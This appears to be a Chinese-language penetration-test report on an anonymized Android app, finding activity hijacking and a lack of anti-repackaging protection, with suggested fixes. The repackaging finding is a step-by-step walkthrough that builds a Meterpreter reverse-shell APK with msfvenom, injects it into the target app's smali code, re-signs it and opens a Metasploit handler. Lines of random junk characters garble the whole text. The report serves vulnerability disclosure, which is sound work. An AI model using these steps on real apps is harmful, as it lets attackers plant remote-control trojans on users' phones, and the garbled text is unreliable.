: R1 l% |6 ^5 t+ H
% @% c; b7 c4 {7 D# Z
; g( B3 _2 e. d
, V3 n( v- ?! C: M
, j q* Y" R' z; E" t4 J) p0 F) h
$ z! t, v0 x4 {0 O4 P
: d. C" W& z; J5 y! G7 P / E; v$ O2 n, x# _8 d) |# B2 ^
2 B) o3 X/ y3 _5 U5 N8 t$ n
表1-2 测试结果
4 u8 v4 Q2 q2 N
% o A) q1 z: S" N6 D% S
& _6 }6 M6 q1 t- ~, w
/ g% ~# R0 P' t( f+ V8 f. g `, R+ e) x$ Z' D
+ K- [- Q7 `9 Y2 M: c% S: H$ T
7 Z4 [) T5 \9 V
: _0 S9 d; \. H9 D5 ^5 C4 f
2 c) V" B' F9 w" b
M7 r+ m' o d9 V/ R: w( p3 m + f* d0 `! e& w; @ m: O
* g7 h, r( L$ x ]& ~8 n, c$ o9 ? 2 检测结果 $ g& C4 [; z' j( V2 h6 u5 C
* u1 R& Y, Y+ ~9 u
$ {, e/ m) b' u" f$ V+ m0 E9 @# T% Z) R+ R- ^+ c
, X! B+ i4 d8 c) f, U, d9 D1 \
, b+ x8 \3 P$ \) Y
2.1 某某某
& ^8 A1 d; V& I- S2 X, J/ ?- O f) j& R z
$ K. ]/ m( ~- H5 g5 @9 g
h0 a6 i, V: l
4 \+ i; D8 @3 j# Q ?' w4 ^% g- G- r
2.1.1检测目标
- e/ ~: s3 E# k2 i z! {# k; A/ b
3 ~$ U# U' A! j; n! I' Z
) r6 ?& \1 A. l" v( c) h6 {
+ X) @/ e3 m0 ]# j7 d1 b5 K9 z& G
3 r# l, x& r5 ^1 J7 z. d0 X0 Z 目标地址: 某某某某某某APP
( {! A2 }' O0 ]% i- \& t8 [% Q# I# ~) _. J h
/ ~$ f5 R* j+ A3 x5 W" `" d3 ]) c0 _% m- }
0 Y% ?( o1 t" g6 O! K
. x! e8 a2 k4 o8 H) g 2.1.2检测结果
1 d& X! o8 G- q4 q; N% z! @
9 D4 F! z% j* g [
4 ^1 t! Z7 a, t2 y
! A5 [% f9 F% P5 v/ G7 o7 `
2 e9 G7 O6 {* r8 p$ F |: _+ r0 C6 R5 G1 R- f W0 m/ X% S4 b
2.1.2.1
7 J+ U" w5 n; q. D0 p) p! D! r# e2 I* f2 `- J8 y- E
: ]4 [5 g, U& w7 |5 x6 O2 U& X' N1 I1 }3 M6 S& w3 e$ ^+ e% U) U* @
+ j" ^; c" W/ h- M
" N+ |/ n' l1 o
漏洞链接地址:某某某某某某APP ' c8 x4 j7 u9 h( }5 f- v
; s& ]) `$ M9 G( S a$ [$ d1 g
9 S- g+ [' @6 s8 A! q1 L
: n* l; r2 M5 [2 x. C- @
- {) l- o( s3 I
. Y- G: D; F" ^! n2 ^
% ?+ G& C( g1 h: o
# T* R! |2 ~$ L
, K. n$ @* T4 V1 u4 u
% N9 `; M U. P2 C 3 a& w% `# _2 U9 _* M
) Z; B2 v2 z+ V7 K9 |: I9 S! K
漏洞分析及取证: + G( R- l3 T/ X" B* I5 N- }/ @4 r& A. g
5 Q/ ?4 ^$ U# t! `
$ `1 v& C" c+ h2 r
! z$ I, ]5 d- W8 ~. ^ ' j. \$ u% e/ H. n$ D8 p* o
( e" y' e' u r I& s& t: w
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ( N. ?5 z! W' z4 G. w; W
. c. Q2 U* A* s0 m8 U% H
% |: A) i: a& ?/ i: x' B l7 Y# X
: Y& B' c8 u( i
! X! ~! W7 e) D! ], S7 [
5 _& v) m! w) A( P+ V% [
! K, N7 O z. P; A0 D7 ?& P* @+ O1 V L
5 M) d$ K5 E( ]3 u+ c" L& G( V4 E
9 `" ?, H3 y6 A! t
, U1 R4 A( O+ e- N; h / b2 U% _, M# S: P- U: R
+ r8 |$ q" z0 P/ L# T/ K 4 n8 D: [: m0 C; H) V+ t; K
3 G U" f' x/ r5 X- i
" } }4 p5 _6 J3 _
# s; ^% \) t' ~4 h+ V1 r3 k
" `9 U# k) R3 Z+ M) M* Z1 n" Z
* @% |9 D" P, `
- @5 C# w, X. C( ?) @; X
; f$ }; U1 L. Q! g
# y. C$ u- ~% D0 T% s1 j1 t+ ~; K
' e8 V. F A! D6 p0 w
5 ]2 d% `+ j2 H, M. D: F
5 b- L. P5 y5 f
: _ K5 H* \4 j8 ?5 I6 G) W. z6 ^
# A* t) V4 f" ?5 ^* s
6 D& o# p; d" h" ^; R
6 D# \/ `& }' D _( C+ D; `. f( M
' e* f, e" B4 }4 r7 v# _ O
" t H; t5 \! S6 v
1 x+ H: K5 _& J5 G5 e
! H6 {* x. @- a$ C- z& T
9 S# |" X. y; J
3 d3 h0 m; \5 q3 M 2 q' s( c2 s8 z/ M) z2 k
- o( ]9 x/ o9 A3 g3 w; u! G1 M 漏洞危害:高 * j& R7 E5 | ^/ r! R8 \0 q; c
* r, Y6 u& n& P; Q
9 F8 o6 M/ e, @* F2 @- r
/ F4 } v& e2 }3 D
. O" y+ A9 i* ]- I { [3 B& `& Z/ I }% ^2 l
8 @- w) |& n0 }* [9 J; Z
- N, L3 g, y% k8 m ! a6 g) M1 z2 K: E# Z% g* a
0 E7 P9 {$ ~3 L# y/ l # e" L9 I5 h+ N( [8 e5 j' C) h: A6 a
6 i: ]8 ^( P) U% C" J
0 ^6 o* @; W0 K7 c% ^ \+ j) R3 i2 _( ], l3 Y- j8 r. q
/ ]! T. W6 Z _: C
# O9 j9 Z3 s) f& H) T2 C8 G4 @6 }
严重程度
' p5 S. _9 J+ T) _- ]3 S5 |: P
7 i4 X5 n9 P( p! o5 A. ~ & f& s0 v8 p4 X* B
5 p& q$ d0 L& }) { |
2 G' P6 t# F- H; D! U% O, }, A5 q' U1 B" D0 y7 }
. Y! ~5 x) ^ f# G$ q! Q
) J6 i7 \) {5 w8 e) V2 Z8 f* E
0 `* G7 \: X _8 d
s( w3 h; t# Y% P q 高 $ [ [# [6 L; u+ G5 p4 z# v
! E6 {8 M4 Z4 K$ n7 s# |, _+ O
' H, ^6 B+ Y1 _& }4 X1 j/ k/ Z. @& Z- c, O! ?" d. W
| * F3 X; U4 i8 c) x' Z# ?5 Z# L
7 \# @7 Y% m# @0 E" g& W' L
4 X0 p/ Z$ p& H% Q, g* A& e$ D' Z" c5 Q
6 _, @& l) Q$ r3 M$ h! c# t, |& t$ u) l$ U7 V) t
■ ; w. S" p/ b+ |5 {, ^. Q+ u- U) @
( ~' }8 M$ H; J. S8 J) h
0 ]1 M) S4 F4 Z: A) e3 O" q1 o; R
5 f0 [) C) y6 B4 p
| 7 {: x- f( G, S$ T1 n+ Q( t
H2 h- ~% x! c' w- p: s. m; A/ i
6 r Q y, o) ]5 c+ l$ q
8 o! z2 ?! C: _ E, Q' B % I( d% \* P- [( f( H1 C
& H1 j8 E' f9 Y: J. ^+ I( p& R 中
2 j0 r: }4 w$ X' W
2 W7 V2 O R) H, {% ]
/ |. k6 y M" {, ^/ K( h! Y9 Y! i) v* [0 w' q
| 9 F) T/ c5 u* f* V- w
& }5 M% ?3 k6 }' K# X" V 4 ~0 }7 g7 g s6 E' k" _7 z
0 r+ T& Y* b* N' L
9 U, u6 J; T# R- t
! d2 n1 f5 f8 T3 L/ k' b7 H- |* c ; L: {0 ~, g8 G* l7 U3 p) O
% ?/ H1 U, G1 t- ^3 W, l/ ]& b/ Q , x" O) F& A) e3 i: w
2 m& d# u8 B3 a | 7 p7 G8 H) q4 q% {
/ T& \& l* H6 M1 B; h* {! ~ # T) c/ f' d1 i7 p
: n! S) g+ ~; n2 r9 c0 s
" E; \6 {' B! j
! h8 ? a( i% [ 低 + q4 h) x' s% _' ~; V" q
: i2 P! F; I( Y2 ~+ U
7 \- M7 p( `1 X2 E; h4 u- Z. g3 i
| " G8 F# F7 e7 d
2 }% ]- r) I5 l; n8 q& E
4 U. i. R& ~1 ]4 f7 \) e! ~( B4 `% d( l9 x* @! i# \3 n
% q* d( q# E7 U# Y/ U. T7 s& b
4 {# Q/ b- H# |' N7 E% N/ l
% G& G/ k) I8 r# X
, X& x2 P' Q2 }% \& E$ R/ u
+ g; Y& p1 e# z7 }
. Z3 D& `/ B5 }2 w% }! n
|
2 Q! O* p) {- j {
7 f, C" H! c) l7 {( i
' T/ V, H9 [; W1 g
$ ~ d" j) j- Y3 h( X3 c
; x2 a! ^" {4 h
h# A* m1 N* v! o8 q/ h3 C* x
/ L0 e) q$ B4 R3 q/ l; u2 j9 ]
8 B- e7 @7 h# B, G# x) K % l. V0 m/ O! n* P% M
! X$ }! q6 s# s+ y( h5 n. R
9 R) U- ]+ J; q+ L2 e- r
& M9 A$ }( d" y" j m" \
' U1 Q6 e! u: R* d+ V9 U$ `; y5 T0 H0 ]- h* }! s" Y0 Z1 I5 p
% n2 p* g! z4 ~5 @# y8 R" @
' q0 _* i" _. P! R* K% a
8 e' K0 `- ]3 ]2 b5 m
* `2 I7 F- a* [+ L! N 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 # A Z6 q( p' E) [3 a( P+ ]
. o: [8 R* S' ?' R& l& M) V
' w' B* f8 z; X2 i
1 t) O, g6 ~% A8 j4 H& Q; E- H
7 `5 v3 X* C3 i6 a7 N& y
% w' K7 u! G/ ]' y1 | 6 e$ r" F6 n- f0 K3 k' {
3 C' l$ r1 l0 D w! C r
. G' R7 n; W9 C; s
, o/ B# J) h! N) `8 F : Z4 ~# A9 N& Z+ j
0 e! m4 X; g9 M4 ?3 O! G: d9 A
9 b5 w# _+ i, Y1 ?
2 o p* c5 M3 _2 K
7 J6 U- O9 ~) [: H$ _4 G' Q" h: _) E2 Q4 F4 r) x; \( a0 F
; s, d$ R4 ^' Z8 @3 k$ q3 R* V3 T& {* @1 h" h
2.1.2.2
4 x- M- }* T6 X; e9 G$ z
5 E5 k, ^4 U5 b* i, \
6 b( a6 O9 W. y2 g3 ^7 v- ?3 j* b; x3 k: Q2 z$ j( Y3 {- z, r
$ S2 V" f6 E$ P. S0 ` V
) t$ U( Y/ k# z4 ^+ ]; o 漏洞链接地址:某某某某某某APP ! b4 C' `( a* a6 F3 ^' ]( H
, o2 Q5 _% f; Q9 T# R e
6 v* d7 U# ]% c) [# ~" n
% e' M5 l: l: x- r8 t2 T/ v% L2 y4 _5 V
- J6 U/ G4 R9 V E I6 O) o S! G; U$ C/ V4 V }- v I
漏洞分析及取证: # P4 F5 E" |9 g4 o2 F9 ^
; E; O3 U/ M1 k' V' i* g! E
& j8 H/ q+ L" \! r2 Z% L* `, c
( ?: k; W; r/ h9 i _! I) D 9 j) l. w/ b- k! [7 l, U
, [* M: h5 F; Q$ u: B% \' v
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
2 m/ X/ X& i) Q6 ~0 \& z. a
. |* ?9 ?5 e# u& k8 r5 m$ v$ g
. [" M( x. {2 k* N( c/ f- d! ^+ A, G& a0 ^+ h5 E( O6 z
' {6 ` ~* E8 R4 g* }: a' Y
% J* x7 u6 |5 @, L 用Metasploit 生成木马 apk ( S: X1 k* k) M
F& `# s/ d* H o! X
/ n8 ?9 i; a: H# I3 {
6 q) y% F4 }3 K ; u/ ?/ T5 Z& ]- r3 e
2 q8 o3 i) L; u r3 r
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
3 Y7 i' O1 ]: Y
1 d+ v: Z; H' Q0 ^5 I; K
& A. x. I4 v! P. F, Y1 o# X
: U# M3 W. ~- p1 r8 u
b% o8 B3 G) ?7 t- r6 B3 h
# }" ?, ]9 s$ t 反编译目标apk和木马apk 6 b6 @2 j/ s, M4 [# @
3 N# h; \- J* B' k$ r. [. {. n
8 y- V' [0 W3 P
2 I1 Y6 `# R# Y: m" b& \* j ) Y& \( A8 y5 |1 [# h9 k7 r6 U
9 L& r) R& z" ?3 {. b1 W0 _" d
apktool d target.apk
+ f+ j2 {8 K' F! y, n7 `
. a' \- L5 b9 H2 P apktool d cockhorse.apk ( n4 v) D. Z: L) y: \; s
' s! _, e8 U. }8 l) m; u
$ g2 J6 F) T4 L! `3 y7 n
0 r% G9 o6 ]" L
* X: h, j7 P" S% ~6 o0 U, U7 W. E9 d1 W1 o+ B
木马 apk 注入目标 apk
8 H' N; U) g! I( Q1 h
# e S0 m6 J7 J: }- I1 k
* |; K8 o5 U( F/ o- {& E, W3 a
6 P( j2 o" U7 d& ^
% z& B$ W6 s2 z) D
- } Z, L9 Q2 W# l4 y3 w 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
l+ `0 J; [7 u( @; o+ }; e3 M# P B. `
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % x( l8 |" ~- J9 V
8 [" _! T4 J+ M* s
, y6 h! y9 U. x- I( T2 @- r/ G- Q
5 @" E* j/ g; V* H) k7 R8 R , m i! r4 g1 X
6 l: c; L Q d2 K$ A' ^. H% R
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
z m5 \* \) U9 j9 O5 B: b+ ^& @( C$ e
0 a s' X% g9 o
8 I' q0 b9 T* j- a/ O- K) E5 Z9 X
2 g/ I q+ H. l3 W) Z/ Q
3 H0 {( w9 U- ~: R3 s 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
1 S( |& O1 {6 m: c( ~9 I& t5 V l7 A9 l
" Z$ a7 B$ e: a) R2 c1 J# E7 X0 G7 T. I+ x
1 H$ N; b' |7 F/ g$ _5 a8 A, u' t6 i7 v) j) P' l- y8 I$ C
回编译生成最终 apk
/ Q3 H, E/ Z- W( ?! |. p2 q; t5 l9 _* b! t
& k$ D0 w7 z* H6 ^; {4 h" a! L8 i
" }( \' g! W' X$ P- c/ s
; r4 T% F' h( g& @, X" `
% h P1 n9 \ Y+ K } 重新打包
# h4 M' X9 ?' P/ Y0 B8 ]
! e# W' u3 J' r0 T7 Q
, v3 f- L* E' ]& E! Y: N! K
3 m3 \$ o7 u5 r$ y x$ O ! q- ~* E$ y( D* k
' b, z$ Y' a$ ?7 [6 p' L apktool b -o repackage.apk target_app_floder ( |: d# @, F- a% x2 ]9 e# }
% l I8 t% A5 [4 \9 P4 n
8 _# S( t1 w8 U6 {1 P
% u. J2 p2 @. J: u4 {2 v2 }6 h/ Y$ q% O
. f; n4 l& e! b
2 z; L: B# J1 B- F 创建签名文件,有的话可忽略此步骤
" R% @; L+ n& n( C! e w8 {2 F( P8 I$ P3 q, b. T3 I g
4 X( R0 l5 ^ C0 i
- C' Y$ s3 R1 Z8 G5 T* `. ]0 e
6 f% P% i3 y4 V& A u# v6 i+ Y+ Q" F# w* Z0 r
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
: i. ?+ Z) J8 o1 R0 b
8 T* J H! l7 W* t' T
+ @. y5 O1 G, B8 e. N
$ g5 Z! f1 N* q/ w3 x( D 0 F/ C( Q. C, U8 V2 p; i/ f! `
7 `* }' V; Y s3 t- k
签名,以下任选其一 ' p2 w _# M7 g+ l/ A8 F& r" n
' b; ]4 r" ]% E5 o N
! C" N% P' ?' ]
9 d( I& y2 y( x! k# n4 a/ z( ]* l8 h& B 4 G9 t X* m6 k, S" w& |" [
6 M4 d) ~6 v3 h" N& o- x+ q6 w
jarsigner 方式 , v$ _/ ]; l: |( _
6 d& y) {- j2 ]- @8 n
9 |0 @( Z7 T2 B) }2 d# H/ {
8 Y% u$ C8 s% c
7 V& i' A4 v0 G/ L% K+ h% M( P3 @5 ?6 Z0 K" i5 D! ~
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname # s$ ]2 d) ~, X
# [: b, f# E2 d* r {- a
6 ]3 r ?1 Z% U+ s+ g& f* G* w
) O& y/ z0 g0 w" ^$ d! c8 o: [2 o* Q; o 9 N+ o8 }" ~0 p( \
9 {6 k, {' k6 I+ ]
apksigner 方式 . p) m- B' ]2 O$ \/ C2 O+ F
8 M* ]! ]; F& ]6 H. L( Z* D% |$ k. f
" V# I2 ~/ l) I& A# j
0 _% m) T& z- b5 C: ^6 [3 A& `
# _, y8 o* ?6 t! c: F1 M, |! ~( v3 e! }
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
6 W1 c& r6 s2 J4 q5 e; E! Z: ~6 a0 z. c) u& P) J1 y/ ~( A
9 j" P' q) Y; p9 s0 M
& q. z3 O ` x+ G6 d' k
~2 D) y! H7 A$ R8 J) Z* S; ?; T7 X7 e$ e+ \; E$ k' h
如需要禁用 v2签名 添加选项--v2-signing-enabled false " \# @3 O& f8 T$ M3 j. N# L
) T) r4 y9 ? q) H
2 o7 _0 f* y0 k" V+ d
% T) A- |" p4 c7 T5 @6 D
! q( T f; T+ t% t
) j% i+ J' g# g: K9 l" n 验证,以下任选其一
6 e1 B3 o" u/ Z0 k% O
/ O4 L6 i: K/ _/ C
5 X# a$ V9 n+ g# d+ J4 [3 g3 Y1 c
- _6 d. _+ U& t% @
: p9 i8 F) c; z7 B% ]+ ^
' L9 c" p: B- s y jarsigner方式 5 S4 t7 y3 W9 s- \/ e
- l4 ^9 K& ~4 E( k; b
3 D2 r5 v" O7 S" k5 x+ q! p4 [
$ j0 k! D: H- O- j$ {" X
- T8 K$ H: F q' e* J$ Z7 q3 g2 C" |" X& n& G
jarsigner -verify repackaged.apk
8 C. ]. t+ s, @( U; ?3 u; C, h- x7 p2 m
" H9 y& c8 h5 S; N6 U4 \, z6 X( u) Z+ ~) T! F
6 L+ K$ a. p$ v/ `" D& n' k
. G) H3 M3 w! j1 c8 ~1 B0 a# I) k apksigner 方式
; q- c! ~& U2 A a1 y r! C0 N/ y
! A! g5 g# w) K& ~
" K$ _. L" R( H6 u% b
! X1 y) m6 K, y
Q- D9 `4 s: d4 a y& z apksigner verify -v --print-certs repackaged.apk
/ R' Q* h' c, q6 k ?! A
# g* Y; [- e+ h3 b9 |/ n
, Q8 l; d+ M0 r+ I) t7 q+ ]
3 A! q: P! z2 F2 X+ ]1 |' P 4 M2 Q: X k3 m% r+ G" M
4 b; s7 z C9 Z0 d3 D8 F- \ ^
keytool方式
# ?1 b( v X/ v% f! n+ }' Z g. Q) n
9 R& g& _; }9 @
7 T8 e6 [- k c; n& K
, N; B% O3 b8 r- d " r6 r5 E3 `; Y
; r- {1 F) E; e! N keytool -printcert -jarfile repackaged.apk H4 O% P1 a% T, h$ e
# z% X! \# c8 g r# D% }% C8 o' J
1 i; t0 j/ K9 F: @9 w5 Q8 S- M# p: Z+ U$ M8 c" d
0 o) h/ D9 i6 l7 \7 H7 @( X
; d$ O$ b! {2 @4 C& B 对齐 % Y$ A0 }2 U* b& b' W
8 Q u" J/ y/ n3 E! J
* D& s q4 u' A5 ~0 o/ P
) O5 P! f3 }( ~9 z2 H- o
9 ], U3 f# w& G2 K, v& l4 h0 q6 q: r% Y6 k& O d
字节对齐优化
7 R7 c5 P; n; X Q, e& |6 l* |1 S$ z0 }6 H1 K& H- q
+ i0 v! B( ~' F3 |; a9 I' H( S* W* J
: N. E7 J8 W2 V5 K 9 ~: d% e4 S$ D
$ [6 q3 m0 Z" W2 s
zipalign -v 4 repackaged.apk final.apk # j2 C4 a/ r$ o
, s7 |' W& K# p
4 O U7 W9 [+ V/ R
1 s1 m4 r& i. t& c# H( v: k
# p8 C- M6 k; ]8 ?/ a/ E' p8 ?
K- C8 z/ i+ A8 j
检查是否对齐
$ [, }3 @/ h! {: Z. \: P ]; Y
/ S' ~' f2 T9 |5 Q( l* _% X+ m( B/ s
$ \0 x- E, l7 _! M( y& s' ]+ r0 H8 M
% S. Y2 S" n) S
zipalign -c -v 4 final.apk 8 z* Z0 F* \2 {/ u. z& U% V
/ Q" ]- r, f( m0 e) {
8 C& L+ K( E0 d: u
$ [6 V: I9 P5 S; c! a
; Q V. ~: B' y9 g4 Q5 F7 B
& F0 @+ s5 e! v( f) h 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 * t! Q8 O! W+ x$ I% ]$ c
" b* t, a' c) \4 f; m
8 M) L( ?$ _' G% L# z0 _; n' H2 m2 R6 }9 M7 W" }& C; w
0 F& w, E9 V' f; t, ^6 d$ A$ b4 u/ ^4 o# l6 j# g2 i) O
启动Metasploit控制台,配置参数等待上线 9 E5 b. }1 n+ c' ]1 A! `/ i# ?
0 f3 `6 a- \; |# L9 k1 `
# h. R! k. T- y
; j- f" f) N9 U7 n; x ! S h& o4 K- ~8 @% f
# g; t7 r3 m" C5 W2 ]
在终端依次输入如下命令 7 s# F# W& r/ z- Y& C$ y& ^6 v6 Z
. `, K: {, z' H: h5 y' }' T
0 G, q0 n5 n" x+ h
0 @# S- A% M+ w5 Z ' F! h2 y& f2 e7 h, D; p
; X' E3 V2 E0 C' i) o+ v2 h
msfconsole 2 X9 z8 i- x$ S
' W! N: m, n# M5 |4 @3 ?& h
) R" U( M+ U1 U: T8 m
/ g( i: I/ D8 I1 s0 { . }: z* p4 F4 J+ Q1 x. w
6 V- M2 i0 L5 a, b/ I
use exploit/multi/handler
% k3 M& T( _8 u7 w/ J! d. P* O& D, K) Q; O6 `% o0 s
4 U: a; V" p+ Q/ Q0 G
$ K/ X9 J5 O0 b2 j. z/ y+ `1 S( }* j
$ [4 k6 E' V9 c/ ]8 q/ d; ]: ~
8 a" H/ \. z) }1 x& t# x9 Y$ ? set PAYLOAD android/meterpreter/reverse_tcp 6 }* y9 `2 v8 A0 h4 R% `! E
+ C" p& d) X9 }& n8 j: X
. w5 N6 c# p8 r1 M8 Y1 m/ S
1 F8 z6 R, r$ J$ ]% D
* E1 i8 {/ f. U& i6 ~
' ~/ A6 V( i0 g" v set LHOST 192.xxx.xx.xx " s! c0 Q2 q) s9 N8 D; W* v7 B5 i+ V
0 b# [- l& @" W- N1 I5 @/ U* R
7 Z% t) m* |) A4 D5 v& _( D1 o9 W7 {; n
1 c! F5 x1 Y3 p( q$ `
: I9 F5 ^8 Z. u( M set LPORT 4444
* ]4 X3 |" m) j3 U: A1 Q: J% z8 V: O1 e9 z+ \# _' o @0 @/ p" _
& p& C/ h" W( a) O& \& t6 M( Z
! X" D( X! ~/ D
( Y$ K7 J$ B+ ^6 x3 k- H2 Y8 K" g8 s
exploit 3 N( Z6 U( n; g* @5 B
) Y8 L# F) `- J) c1 U1 F/ e: p
' D1 u0 x/ n F; y1 _/ c
* p6 ^- [) k, k& b$ T& ^ 8 h' d2 G1 c' r% K5 s7 H
& e/ O" a% M1 S6 @1 R% D! X9 N
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
0 [, _* ~% ^: M$ m0 x1 s7 ~6 @) f9 T( M+ F7 E$ }' ?$ p3 t
/ Y$ J% f& K; V- y
0 ^& s# N8 a, ~) {6 i! z% M
' z. @$ g+ Y7 ~" y4 {* N& F
0 n# P/ W# f z
漏洞危害:中 8 F ]. @6 L& |* n9 ^- G
0 |9 E1 r& Y3 j k4 m% O0 y
# |" A) Q. T$ Q4 e7 M6 }& z! M1 r' S4 i- |
# U: q) R2 q* L/ `, w1 Q
d+ \! ~' p6 y6 J
2 Q w1 \5 M1 n& O# O7 u: e9 Y1 P* s7 `* l. i6 |7 r1 C# r+ o# G4 I2 [
" C! m6 u1 {; _0 T/ j! J4 o8 G0 ]9 k) O: ]( v
4 P5 E7 M* I# ?6 d/ y. j y
, Y) A- {& z: n. T5 P. v ; k) j+ f2 C- R4 J2 z* `- F: ]
1 J, X; ]! e, v
% |( G, c9 s2 G F$ P+ `( c% ]7 [5 w# h# z2 ~0 B! P$ K
! z9 y9 F7 A/ V* P" L; `3 l( ]* B) X' B9 g s5 d) }' B8 N
严重程度 ' `2 B# A2 W1 e$ p9 D. X( m7 @ D
% ?: t9 p- n- j* {8 V+ ?5 N
, J# e8 Z) ?1 K7 z* G1 P) C& y) |
|
, ^4 s) N1 \+ @: H
6 d t, S- Q0 R
$ M4 W# a6 X! | s: r1 ~8 u' X- F4 b
2 L5 M2 d" p, O6 o% p4 P" g
" O) ~- m1 E8 W+ x7 o
- S1 A2 `- o7 _; K 高 * \$ r# o: d# F/ y. @* _
9 Z7 e( x; E; G8 a/ v
1 h( @9 f# \" C) ~5 S
. [4 C) Z. C W | 1 n) b9 H$ `/ p! k/ o2 v; L) |
4 C$ K9 D' j A! X2 w
. {, e. ]0 @" v1 c. R; w
7 \/ z, A$ v8 V- j e; \, V
' |* n8 p# c; `3 ?' o9 v3 ?
3 N6 i, y+ l5 I1 v. J7 k ■ 4 F- a& F& [; @! G5 ~2 Y" ^& k7 E
5 P5 z; I! t! c) f$ g0 C# _
2 }" a. r' p8 m" F9 Q8 k4 J$ |' J
$ r5 V, o2 m M% a9 m | $ ]7 a# p& U$ F. [
' S3 S/ l( P7 m0 @" S w. `" ~$ x& H5 N. I/ k: i6 H
4 ^4 V! n, H, z) ^) h {4 F) o7 d9 _. K' P7 ~6 D( \
( Q6 |$ L( C4 ?" f1 G- Z2 H 中
. w: K2 p$ A4 b; S6 @2 R5 m5 t; L. z- [( ~' V
3 W4 s" N4 v! T- T
( T0 \9 \% A6 g w- L5 x" [( p | + z- h3 N1 ]& d$ S: |1 p
4 Q# M( F& M- C# A* v2 m
5 o/ R' k9 v$ Y
" q- ]9 p- L9 D / e1 D8 K" y+ M" n
- R$ R3 H8 n A: W' Z1 Q. b" O+ A3 N1 c
( v0 Y9 l- m" d1 J' o# ?
- N! _ g+ c" R E' e# N$ J& V* u8 _ * w+ z! r; @0 R! m, B m
* z D V" a0 x$ S. g + N/ x' n( u. b* U$ _( q
t* ]: }0 q+ q3 f | $ T5 {: ? M* V3 d, f- m* q5 `, }
+ e8 E! x1 Y9 I9 \3 G7 O 1 K/ _, l) E* M7 Y0 I" b+ Y
7 ^/ B: V5 Q& T, [1 l- u3 c
. _7 f1 s: A7 t ?# H7 F4 |5 ^4 t* h; j: |2 a
低 1 a1 E9 }, R ?% h# u, @
1 g& P9 t5 c) y
+ z$ o+ G, H' }4 l
g, r; g6 ?% p5 T- Z' H | . z& M. } U3 L# W
$ v5 \; E% P* K9 K
0 ?! P6 ?, z+ c9 d3 _
) t/ |! t5 w, x0 A: K+ |+ v
7 O! J7 g0 _) L6 s& t; T/ s, p& Q) \) j3 k5 x
! j! g, G- p( s. P. e
+ B, m9 a) `& W* |
$ _9 Q4 e9 K" Y3 l* d6 N- d" l4 z3 P
; [' V0 E+ _6 P6 U! t# ], d
4 |) c0 ^$ G' _( X; I% c7 _% s7 g+ n! C+ V2 C% s
|
. Z6 t. @7 ~1 N# C, Y b' i
, l" O# U) _& }1 e2 o" p4 w
p! `/ A/ m; L5 }# K6 s. A+ d. P
/ v& f7 o) R7 O 1 Y9 t+ `% x; e2 ~3 @8 d
% C" R9 F- ]+ Q8 O, C+ d' i5 S
8 U2 k0 k( E( }8 j A/ G8 ?6 G0 `3 N6 t2 f X3 L) t
! E* L. {1 b% F
7 ~* z q! J" t Y! K
9 c9 D$ ]* x/ s) [ j
$ q2 M$ z0 s) f" T; @8 ~9 n . {" W4 ^, p8 T( v5 ~
3 P ^0 a; e5 F/ S( v; p
! t3 C7 w4 E8 i5 p- C$ ?
- p2 U; I3 J \( r% d3 s
$ g. a" {5 b+ D" _
# M" S5 X5 V. [, |; e9 I 修复方法: + k9 ^, W. E. ^/ b ]) I
/ q s( c! p& ~9 Q9 v
# ]& s3 F Y( S4 F, o
2 p8 D n9 `: \1 p* l0 `" w ) m' \. F/ R; q2 D
7 Y; M2 _/ f6 x! Y/ I9 @2 m T1 ^ 1.在 APP 启动时应做签名校验防止二次打包。
+ ]) v( g5 V8 J' g/ ]9 I0 M: j" ]' `. x
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
9 H$ x8 a: o0 J* I1 t1 Q0 ^
3 \ j( _8 ], ?) [
$ x3 C" q! }0 p( ^7 E% S* y: b
9 R" r' H# C' [( _$ P4 J! I, J* t* S q2 D4 x/ G6 I3 r: |" R
8 E" ?+ K) v S& |5 R* v% Y
7 B! W% S" [+ P: d; O/ U0 E8 \! j' m% V0 `+ j/ N( a) t/ ]
4 f; w3 {( d0 l5 m Y
, i: P% s. ~% Q X T
r3 c' m% G" l2 ?8 h, y% X( p
2 k! k: m1 ~9 i) [
8 x1 @, Q; o: _+ u6 b- t$ P8 R/ A1 a5 r. Y% c" j: B
( |) p$ x" A3 O$ n5 n8 [5 e# F6 n' @0 j7 d
, H9 t C7 Z7 U, r: t
]7 n. _& c7 w p, K1 \
$ m/ q( N6 n5 c
7 j3 {. s. ]" Q7 h$ p